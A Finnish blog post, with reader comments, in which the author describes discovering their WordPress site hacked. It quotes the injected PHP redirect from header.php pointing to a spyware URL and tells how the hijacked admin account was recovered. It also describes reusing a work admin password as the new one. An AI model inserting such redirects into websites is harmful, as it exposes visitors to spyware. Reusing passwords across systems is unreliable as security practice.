Rollemaa muualla
- Liity Rollemaan Facebook-sivulle!
- Selaa Rollemaan Flickr-kuvia!
- Seuraa Rollea Twitterissä!
- Seuraa Rollemaata blogilistalla!
- Liity Rollemaan Last.fm-ryhmään!
- Lisää Rolle Myspace-kaveriksi!
- Katso Rollen Youtube-videoita!
- Liity Rollemaan Wakoopa-ryhmään!
- Seuraa Rollea Tumblrssä!
- Seuraa Rollemaata Bloglovinissa!
Tänä aamuna tajusin että rollemaa.orgin WP oli mystisesti mutatoitunut eilisiltapäivästä. Sivu oli täynnä virheilmoituksia ja header.php:n ensimmäinen rivi sisälsi seuraavan pätkän (älä mene tuohon osoitteeseen, se sisältää spywarea):
<?
header(“Location: http://scanner.malwarealarms.com/5/?advid=2241″);
?>
Admin-tunnukset oli ryöstetty ja sähköpostiosoite muutettu lol@lol.ru -osoitteeksi. Menin phpMyAdminiin ja pengoin wp_usersin alta adminin ja vaihdoin sähköpostiosoitteen, jolloin sain salasanan vaihdettua. Myönnän että adminsalasanani oli aivan liian helppo, alkuajoilla keksitty. Nyt se on 14-kirjaiminen (sama kuin työadminkoneeni salasana, isoja ja pieniä kirjaimia ja numeroita sekaisin, muistan sen hyvin).
Liekö sitten kyseessä nykyisen WordPressin haavoittuvaisuus vai salasanan helppous… voisinpa tämän rohkaisemana päivittää WP:ni uusimpaan. Ilkeää.
Aiheeseen mahdollisesti liittyvää:Kirjoittaja on 23-vuotias viittomakielinen elämäntapanörtti, noin 10 tietokoneen omistaja, Linux- ja Android-käyttäjä, hevimies, naimisissa kuurosokean kanssa. Harrastukset ammattina. Harrastaa myös kirjoittamista ja elokuvia suurehkossa mittakaavassa. Lisää tietoa →
auts :(
1 Kirjoitti: DorianG, 4 vuotta sitten
Ouh :( Voihan olla mahdollista että palvelinkin on hakkeroitu, mutta toisaalta kuulostaa enemmän taas noilta konffi-exploit-scripteiltä.
No eihän WP ole niin hirveän turvallinen softa kuitenkaan, jos mietitään että jopa script kiddiet pääsee sivuston kaatamaan “hetkessä” hakuammulta scripteillään.
Mutta onhan muissakin blogisoftissa omat aukkonsa.
Kuinka monta merkkiä oli alkuperäisessä salasanassa? Jos haluamme nussia pilkkua voimme laskea sen muodostamisen maksimiajan ;)
2 Kirjoitti: Gocom, 4 vuotta sitten